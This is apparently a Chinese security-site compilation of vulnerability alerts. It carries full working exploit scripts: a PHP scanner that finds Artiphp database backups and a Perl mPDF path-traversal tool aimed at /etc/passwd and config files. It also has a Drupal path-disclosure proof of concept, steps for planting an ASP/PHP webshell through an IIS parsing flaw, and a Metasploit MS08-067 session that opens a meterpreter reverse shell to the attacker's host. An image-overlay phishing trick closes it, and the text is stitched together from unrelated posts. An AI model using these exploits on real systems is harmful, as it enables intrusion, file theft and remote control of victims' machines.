下面是小编给大家带来关于Artiphp CMS 5.5.0数据库备份泄露Exploit漏洞预警(共含7篇),一起来看看吧,希望对您有所帮助。同时,但愿您也能像本文投稿人“xx”一样,积极向本站投稿分享好文章。
/*
Artiphp CMS 5.5.0 Database Backup Disclosure Exploit
作者: Artiphp www.2cto.com www.artiphp.com
影响版本: 5.5.0 Neo (r422)
Summary: Artiphp is a content management system (CMS) open
and free to create and manage your website.
描述: Artiphp stores database backups using backupDB utility
with a predictable file name inside the web root, which can be
exploited to disclose sensitive information by downloading the
file. The backup is located in '/artzone/artpublic/database/'
directory as 'db_backup_[type].[yyyy-mm-dd].sql.gz' filename.
测试平台: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.21
PHP 5.3.8 / 5.3.9
MySQL 5.5.20
Gjoko 'LiquidWorm' Krstic @zeroscience发现的本漏洞
*/
error_reporting(0);
print “\no==========================================================o\n”;
print “| |”;
print “\n|\tArtiphp CMS 5.5.0 DB Backup Disclosure Exploit |\n”;
print “| |\n”;
print “|\t\t\tby LiquidWorm |\n”;
print “| |”;
print “\no==========================================================o\n”;
if ($argc < 3)
{
print “\n\n\x20[*] Usage: php $argv[0] \n\n\n”;
die();
}
$godina_array = array('','','');
$mesec_array = array('12','11','10','09',
'08','07','06','05',
'04','03','02','01');
$dn_array = array('31','30','29','28','27','26',
'25','24','23','22','21','20',
'19','18','17','16','15','14',
'13','12','11','10','09','08',
'07','06','05','04','03','02',
'01');
$backup_array = array('full','structure','partial');
$host = $argv[1];
$port = intval($argv[2]);
$path = “/artiphp/artzone/artpublic/database/”; // www.2cto.com change per need.
$alert1 = “\033[0;31m”;
$alert2 = “\033[0;37m”;
foreach($godina_array as $godina)
{
print “\n\n\x20[*] Checking year: ”.$godina.“\n\n Scanning: ”;
sleep(2);
foreach($mesec_array as $mesec)
{
foreach($dn_array as $dn)
{
print “~”;
foreach($backup_array as $backup)
{
if(file_get_contents(“”.$host.“:”.$port.$path.“db_backup_”.$backup.“.”.$godina.“-”.$mesec.“-”.$dn.“.sql.gz”))
{
print “\n\n\x20[!] DB backup file discovered!\n\n”;
echo $alert1;
print “\x20==>\x20”;
echo $alert2;
die(“”.$host.“:”.$port.$path.“db_backup_”.$backup.“.”.$godina.“-”.$mesec.“-”.$dn.“.sql.gz\n”);
}
}
}
}
}
print “\n\n\x20[*] Zero findings.\n\n\n”
?>
发布日期:2011-10-28
更新日期:2011-10-28
受影响系统:
Apple QuickTime Player 7.x
不受影响系统:
Apple QuickTime Player 7.7.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 50130
CVE ID: CVE-2011-3220
QuickTime是由苹果电脑所开发的一种多媒体架构,能够处理许多的数字视频、媒体段落、音效、文字、动画、音乐格式,以及交互式全景影像的数项类型,
Apple QuickTime信息泄露漏洞漏洞预警
,
Apple QuickTime在处理视频文件中的URL数据处理程序时存在未初始化内存访问问题,攻击者可利用此漏洞读取内存内容。
<*来源:Luigi Auriemma (aluigi@pivx.com)
链接:support.apple.com/kb/HT5016
*>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
support.apple.com/
Drupal 7.14 <= Full Path Disclosure Vulnerability
About Drupal:
“Drupal is an open source content management platform. powering millions of websites and
applications. It's built, used, and supported by an active and diverse community of people
around the world.”
Drupal is used by common companies like Ing/Diba, Amnesty International and The White House.
Issue: Full Path Disclosure
风险等级: Medium
The remote attacker has the possibility to detect the full local path of drupal.
This information can be used for processing further attacks against the server.
In includes/bootstrap.inc, line 2695:
-------------------------------------
function request_path {
static $path;
if (isset($path)) {
return $path;
}
if (isset($_GET['q'])) {
// This is a request with a ?q=foo/bar query string. $_GET['q'] is
// overwritten in drupal_path_initialize(), but request_path() is called
// very early in the bootstrap process, so the original value is saved in
// $path and returned in later calls.
$path = $_GET['q'];
}
elseif (isset($_SERVER['REQUEST_URI'])) {
// This request is either a clean URL, or 'index.php', or nonsense.
// Extract the path from REQUEST_URI.
$request_path = strtok($_SERVER['REQUEST_URI'], '?');
$base_path_len = strlen(rtrim(dirname($_SERVER['SCRIPT_NAME']), '\/'));
// Unescape and strip $base_path prefix, leaving q without a leading slash.
$path = substr(urldecode($request_path), $base_path_len + 1);
// If the path equals the script. filename, either because 'index.php' was
// explicitly provided in the URL, or because the server added it to
// $_SERVER['REQUEST_URI'] even when it wasn't provided in the URL (some
// versions of Microsoft IIS do this), the front page should be served.
if ($path == basename($_SERVER['PHP_SELF'])) {
$path = '';
}
}
else {
// This is the front page.
$path = ''; www.xxx.com
}
// Under certain conditions Apache's RewriteRule directive prepends the value
// assigned to $_GET['q'] with a slash. Moreover we can always have a trailing
// slash in place, hence we need to normalize $_GET['q'].
$path = trim($path, '/');
return $path;
}
-------------------------------------
Exploit / Proof Of Concept:
www.xxx.com /?q[]=x
-------------------------------------
修复方案:
Search for:
$path = trim($path, '/');
And add the following line above:
if(is_array($path)) { die(); }
-------------------------------------
标题: mPDF <= 5.3 File Disclosure
作者: ZadYree
下载地址: www.mpdf1.com/mpdf/download
影响版本: 5.3 and prior
测试平台: 多个
#!/usr/bin/perl -U
=head1 TITLE
mPDF <= 5.3 File Disclosure Exploit (0day)
=head2 SYNOPSIS
-- examples/show_code.php --
preg_match('/example[0]{0,1}(\d+)_(.*?)\.php/',$filename,$m); <--- URI unproperly filtered.
$num = intval($m[1]);
$title = ucfirst(preg_replace('/_/',' ',$m[2]));
if (!$num || !$title) { die(“Invalid file”); }
=head2 DESCRIPTION
This vulnerability, due to a weak filter, lets you download any unprotected remote
content, under PDF format.
The exploit may not work, depending on the set up htaccess/chmod rules on the
remote server.
=head2 USAGE
perl exploit.pl -r www.2cto.com /mpdf53/ ../config.php
perl exploit.pl -a p00niez.com/mpdf53/ /etc/passwd
Requiered modules:
PDF::OCR2
LWP::Simple
File::Type
Download a module:
sudo cpan -fi install Module::Name
=head3 Author
Zadyree ~ 3LRVS Team | Blog: z4d.tuxfamily.org/blog
=head3 Thanks
PHDays CTF - Yes, CTFs sometime do give you 0dayz
3LRVS Team - Support
=cut
#************* Configuration **************#
my $pdf_file = '/tmp/b00m.pdf';
$PDF::OCR2::CHECK_PDF = 0;
$del_temp_file = 1;
#******************************************#
use 5.010;
use PDF::OCR2;
use Getopt::Std;
use LWP::Simple;
use File::Type;
use constant TRUE =>1;
use constant FALSE =>0;
help() unless (@ARGV >= 2);
my (%optz, $uri);
getopts('rah', \%optz);
my $relative = $optz{'r'};
my $absolute = $optz{'a'};
my $help = $optz{'h'};
help() unless ($absolute || $relatife);
my ($purl, $fpath) = @ARGV;
my $name = $purl;
$name =~ s{(.+?)/.*} {$1};
$name .= (“_” . localtime(time) . “.txt”);
$uri = '/examples/show_code.php?filename=example03_LRVS.php/../../../../../../../../' if ($absolute);
$uri = '/examples/show_code.php?filename=example03_LRVS.php/../../' if ($relative);
help() unless ($uri);
my $furl = $purl . $uri . $fpath;
$furl =~ s#(//)#$i++?“/”:$1#eg; # Yeah that's twisted.
say “[*]Retrieving content...”;
my $file = make_file(get($furl));
die “[-]The stream you requested is not well formatted (forbidden page, etc).\012” unless is_pdf($file);
say “[+]OK\012[*]Converting format...”;
$pdf = PDF::OCR2->new($file);
my $text = $pdf->text;
$text =~ s/[^\x0A-\x7F]+?//gm;
open(my $fh, '>', $name);
print $fh $text;
close($fh);
say “[+]OK\012[+]Content successfully extracted!\nFile: ”, $name;
unlink($pdf_file) if ($del_temp_file == TRUE);
sub make_file {
my $content = shift;
open($fh, '>', $pdf_file);
print $fh $content;
close($fh);
return($pdf_file);
}
sub is_pdf {
my $checked_file = shift;
my $ft = File::Type->new();
return(1) if ($ft->mime_type($checked_file) eq “application/pdf”);
return(0);
}
help() if ($help);
sub help {
say <<“EOF”;
Usage: perl $0 [-r|-a] [mPDF URL]
Details:
-r : Relative path (ex: ../file.php)
-a : Absolute path (ex: /etc/file.zd)
For any more information, feel free to contact ZadYree
Happy hacking!
EOF
exit(0);
}
From:www.4safer.com
SQL备份,当我看到这个页面的时候有了思路。
看图编号1,是存放目录。再看编号2,写着目录不存在系统就自动建立。说明那个目录可以自己写。再看编号3.写着系统自动生成一个readme.txt文件,
大家肯定有想法了。我想起利用IIS解析漏洞。在目录添上 z.asp 在备份说明填入自己的ASP马或PHP马。然后大家 点管理备份目录
点那个查看备份说明就可以看到自己的马。O了。
这个漏洞已经暴露了很久了,这里我就不说原理了我也不会,所以直接用metasploit操作一下,大牛请绕过
root@bt:~# genlist -s 10.10.10.*
10.10.10.1
10.10.10.2
10.10.10.128
10.10.10.130
10.10.10.254
root@bt:~# nmap -sS -Pn 10.10.10.128
Starting Nmap 6.01 ( nmap.org ) at -04-23 01:49 EDT
Nmap scan report for attacker.dvssc.com (10.10.10.128)
Host is up (0.0000060s latency).
All 1000 scanned ports on attacker.dvssc.com (10.10.10.128) are closed
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
root@bt:~# nmap -sS -Pn 10.10.10.130
Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT
Nmap scan report for service.dvssc.com (10.10.10.130)
Host is up (0.011s latency).
Not shown: 985 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
777/tcp open multiling-http
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1521/tcp open oracle
6002/tcp open X11:2
7001/tcp open afs3-callback
7002/tcp open afs3-prserver
8099/tcp open unknown
MAC Address: 00:0C:29:D3:08:A0 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
root@bt:~#
root@bt:~# nmap --script=smb-check-vulns 10.10.10.130
Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT
Nmap scan report for service.dvssc.com (10.10.10.130)
Host is up (0.00032s latency).
Not shown: 985 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
777/tcp open multiling-http
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1521/tcp open oracle
6002/tcp open X11:2
7001/tcp open afs3-callback
7002/tcp open afs3-prserver
8099/tcp open unknown
MAC Address: 00:0C:29:D3:08:A0 (VMware)
Host script. results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE--3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
root@bt:~# msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nopsmsf >search ms08_067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi -10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption
msf >use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >set RHOST 10.10.10.130
RHOST =>10.10.10.130
msf exploit(ms08_067_netapi) >set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD =>windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) >show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.10.10.130 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >set LHOST 10.10.10.128
LHOST =>10.10.10.128
msf exploit(ms08_067_netapi) >exploit
[*] Started reverse handler on 10.10.10.128:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows - No Service Pack - lang:Unknown
[*] Selected Target: Windows 2003 SP0 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 10.10.10.130
[*] Meterpreter session 1 opened (10.10.10.128:4444 ->10.10.10.130:3722) at 2014-04-23 01:53:59 -0400
文章作者:aullik5
原始出处:hi.baidu.com/aullik5/blog ... a02c6785352416.html
今天要讲的这个漏洞是一个非常猥琐的漏洞,
XSIO漏洞漏洞预警
。
大部分网站都有这个漏洞,不光是百度。
什么是XSIO,为什么说它猥琐呢?
XSIO是因为没有限制图片的position属性为absolute,导致可以控制一张图片出现在网页的任意位置。
那么我们就可以用这张图片去覆盖网页上的任意一个位置,包括网站的banner,包括一个link、一个button。
这就可以导致页面破坏。而给图片设置一个链接后,很显然就可以起到一个钓鱼的作用。
XSIO漏洞:
由于对正常的HTML 标签 是没有做过滤的,所以我们可以用这些标签来实施XSIO攻击,
在百度,发blog是在一个table里,所以我们要先把table闭合掉,然后再插入合适的图片。
如以下代码:
复制内容到剪贴板
百度.jpg(40.08 KB)
2008-10-21 20:50
如图:匿名用户的头像被我覆盖到了banner处.
在实施具体攻击时,可以用图片覆盖link或者banner,当别人点击原本是link或button时,将跳到我们的恶意网站去。
所以说,这是一个非常猥琐的漏洞!
欲知后事如何,且听下回分解!
PS: 本次活动仅仅是个人行为,与任何组织或集体无关.
从明天开始,将进入我们的XSS之旅。
★ dedecms 5.7 edit.inc.php文件注射漏洞预警
